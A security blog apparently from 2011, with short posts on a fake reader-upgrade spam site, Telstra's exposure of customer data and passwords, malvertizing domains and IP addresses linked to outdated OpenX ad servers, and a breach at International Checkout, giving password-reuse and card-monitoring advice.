Spyware Sucks

SPAM: “official-reader-upgrade.com”

It’s not legit people:

Click on the link you end up here:

But click on “Download Now” and look where you end up…

And, of course, it’s not free…

Interestingly, the McAfee logo is not clickable

We get it–you won :-D

More on the Telstra stuff up…

Word is emails are flowing again, which is good… as for the rest of this sorry tale..

More information is flowing in about what was exposed:
http://www.watoday.com.au/it-pro/security-it/telstra-customer-database-exposed-20111209-1on60.html?comments=34#comments

“detailed information outlining the customer's account number, what broadband plan they're on, what other Telstra services they're signed up to and notes associated with the customers' accounts including in many cases their usernames and passwords”

“details about technician visits, SMS messages sent to private mobile numbers and credit check details”

“At about 4.45pm AEDST, about an hour after Telstra was notified of the breach by this website, customer details were still accessible. At about 5pm AEDST the site presented internet users with "Access Denied".”

The source article also reveals that Telstra are a customer of Pure Hacking, a company that claims it has “the expertise needed to keep the wrong people from getting to the sensitive places in your computing infrastructure” – seems to me they missed something pretty damned basic here (assuming that Telstra purchased a service that should have picked up such a glaring deficiency).  Who knows, maybe Pure Hacking were only undertaking penetration testing and intrusion detection and prevention, which could, I guess, miss a "served-on-a-platter-all-you-can-eat-no-hacking-needed” incident like the Telstra one.

Ty Miller has a blog on the purehacking.com website, which I shall be watching with interest:
http://www.purehacking.com/blogs/ty-miller

Photo source: Michael Lee/ZDNet Australia via http://www.zdnet.com.au/telstra-exposes-customer-information-339327696.htm – original url: http://cdn.cbsi.com.au/story_media/339327696/bundlefail_1.jpg

Scammer paradise….

Oh great…

Imagine this. Some scammer spots the above tweet and thinks, “cool, let’s do some cold calls”…

“Hi Mr Telstra customer, we’re calling from Telstra about our screwup last week .. you saw our tweet on our official Twitter account saying we’d call everybody? Cool…” … and so the scam conversation goes on…

Telstra – registered express post is the way to go with this one… oh, sorry, is that too expensive? Tough!

In short, how are your customers meant to know, when that phone rings, that the person calling them is really Telstra, and not some scammer taking advantage of the situation?

Telstra exposes customer user names and passwords to the world

Unbelievable, isn’t it:
http://www.theage.com.au/it-pro/it-news/telstra-probes-privacy-breach-amid-network-outage-20111210-1ooez.html

Email, online billing, BigPond self-care and “My Account” have been down since Friday evening, and Twitter has been in meltdown.  Note: it seems that only *incoming* email is affected now – reports indicate that outgoing email is working just fine at time of writing (2:54 EST)

A horrid situation, to be sure, but I do wonder at some of the complaints that I am seeing on Twitter about the action Telstra took.

Imagine if Telstra had held off so it could notify customers first – that would have given spammers/scammers/criminals more time to use stolen credentials.

Really? You really sure you want them to do that? You might be one of the people who had their email username and password exposed.

Anyway…. what’s to be the next step?  Obviously everybody at potential risk is going to have to change their passwords, but how to tell them to do it? Turn on email access again and send them an email, hoping that they’ll read it and change their password real quick.  But how to protect users for that period of time between email service being reactivated and passwords being changed? At the very least the Bigpond email servers should reject any connections not coming from a computer with a Bigpond IP address – it’s not perfect, and it has it’s drawbacks, but its better than nothing.  I don’t envy Telstra the challenges that face them now.

Telstra users actually choose their own password when setting up their accounts in shop nowadays instead of being issued a password by Telstra – I’ve been there when a salesman asked a person to write down their choice of password onto a piece of paper so that he could enter it into the computer.  I didn’t like that protocol then and I don’t like it now – I shudder to think how many people use the same password on multiple accounts.

We have no way of knowing how long the data breach existed, or how many people viewed the now disabled web page.  I would strongly recommend that affected users change not only their Telstra password but also the password of any other sites that they have used the same password for, ESPECIALLY if they have used their Bigpond email address as their log in name.

In fact, that advice applies to EVERYBODY.  Be very careful about sharing passwords across multiple services, and NEVER use non-unique passwords on email, banking or financially sensitive sites.  Ask yourself, if a site is hacked or your info is negligently exposed (as happened with Telstra), and somebody got your info from that one site, what other sites could they get access to?  Could crooks use your username and password to get into one of your email accounts? Could they then send password reset requests for *other* sites to the email account that they have got into? Think big picture.

Malvertizing activity

There has been a lot going on in the malvertizing world lately, with a spike in the number of reports coming in about malvertizing incidents that are occurring because the Ad Server in question is running an old and exploitable version of OpenX – people, we need to be running version 2.8.8.

The bad guys have been able to insert malicious iframe scripts in tandem with legitimate advertising, and sometimes obfuscated JavaScript that causes various requests to domain names within the *.dyndns.org namespace.

A couple of domains implicated in malvertizing incidents are reonmedia.com and malidie.com

reonmedia.com (registered 19 June 2011 – reonmedia.com cookie spotted in a conversation about an infected computer here)
IP address at time of writing 176.65.162.61 – Zexotek It-services, Gmbh
Registrar: DIRECTI
Registrant: LEGAZ Inc, Anthony White (anthonywhite@gmail.com)
Sharing IP with adtiara.net

adtiara.net (registered 15 July 2011)
Registrar: DIRECTI
Registrant hidden by privacyprotect.org

malidie.com (registered 21 July 2011)
IP address at time of writing 188.72.204.48 – Hessen, Frankfurt, Netdirect
Registrar: BIZCN.COM, INC
Registrant hidden behind privacy-protect.cn
Sharing IP with inviasat.ru and gennetron.com

gennetron.com (registered 21 July 2011)
Registrar: DIRECTI
Registrant hidden behind privacy-protect.cn

inviasat.ru (registered 1 June 2011)
Registrar: REGRU-REG-RIPN
Registrant: “Private Person”

Also mentioned in recent times – trekmedia.net – including here:
http://stopmalvertising.com/tag/trekmedia.net.html

trekmedia.net (registered 14 February 2011)
IP address at time of writing 173.236.89.200
Registrar: ENOM, INC
Registrant hidden behind WhoisGuard

Also adveritising.com (note the extra letter i)

adveritising.com (registered 17 July 2011)
IP address at time of writing 50.17.195.149
Registrar: DYNADOT, LLC
Registrant hidden behind Dynadot Privacy

International Checkout (URL: internationalcheckout.com) hacked

A friend received the email below the other day.  Note that not only do International Checkout advise that “an intruder accessed and potentially compromised [their] system”, but the intruder / intruders also “gained access to part of [their] system that contained credit card numbers of customers” AND the intruder / intruders were able to “access the encryption key [for the credit card information database] that was stored separately”.

My friend’s credit card was misused, with many overseas transactions being charged to her card.

If you go to the internationalcheckout.com web site, and look at the large list of partners currently using the service, you can get a sense of the scale of the potential problem.

If you have used any of the merchants listed on the internationalcheckout.com web site please keep a close eye on your cards.  If you know anybody that has used the sites, let them know about what has happened.